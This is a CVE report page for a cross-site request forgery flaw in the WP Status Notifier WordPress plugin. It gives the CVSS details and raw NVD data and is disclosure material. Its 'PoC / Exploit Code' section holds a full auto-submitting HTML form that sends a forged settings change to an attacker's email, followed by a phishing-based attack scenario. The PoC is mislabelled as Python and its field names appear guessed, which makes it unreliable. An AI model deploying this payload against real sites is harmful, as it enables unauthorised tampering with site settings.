Security Vulnerability Report
中文
CVE-2025-13521 CVSS 4.3 MEDIUM

CVE-2025-13521

Published: 2026-01-07 12:16:49
Last Modified: 2026-04-15 00:35:42

Description

The WP Status Notifier plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0. This is due to missing or incorrect nonce validation on the settings update functionality. This makes it possible for unauthenticated attackers to update the plugin settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

WP Status Notifier <= 1.0(所有版本均受影响)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2025-13521 --> <!-- Target: WordPress site with WP Status Notifier plugin <= 1.0 --> <!DOCTYPE html> <html> <head> <title>Status Update</title> </head> <body> <h1>Please wait...</h1> <form action="http://target-wordpress-site/wp-admin/admin.php?page=wp-status-notifier-settings" method="POST" id="csrfForm"> <!-- Nonce validation is missing, so we can forge the request --> <input type="hidden" name="wsn_settings[notification_email]" value="[email protected]"> <input type="hidden" name="wsn_settings[enable_notifications]" value="1"> <input type="hidden" name="wsn_settings[status_threshold]" value="999"> <input type="hidden" name="action" value="update"> <input type="hidden" name="option_page" value="wsn_settings"> </form> <script> // Auto-submit form when page loads document.getElementById('csrfForm').submit(); </script> </body> </html> <!-- Attack Scenario: 1. Attacker creates this malicious HTML page 2. Lures WordPress admin to visit the page (e.g., via phishing email) 3. Browser automatically submits the form with admin's session cookies 4. Plugin settings are modified without admin's consent 5. Attacker can change notification email to receive alerts or disable security features -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13521", "sourceIdentifier": "[email protected]", "published": "2026-01-07T12:16:48.770", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WP Status Notifier plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0. This is due to missing or incorrect nonce validation on the settings update functionality. This makes it possible for unauthenticated attackers to update the plugin settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link."}, {"lang": "es", "value": "El plugin WP Status Notifier para WordPress es vulnerable a la falsificación de petición en sitios cruzados en todas las versiones hasta la 1.0, inclusive. Esto se debe a la validación de nonce ausente o incorrecta en la funcionalidad de actualización de ajustes. Esto hace posible que atacantes no autenticados actualicen los ajustes del plugin a través de una petición falsificada, siempre que puedan engañar a un administrador del sitio para que realice una acción como hacer clic en un enlace."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/wp-change-status-notifier/tags/1.0/options-page.php#L2", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/wp-change-status-notifier/trunk/options-page.php#L2", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/fbffc404-9ea9-4025-8241-2c374b760ca3?source=cve", "source": "[email protected]"}]}}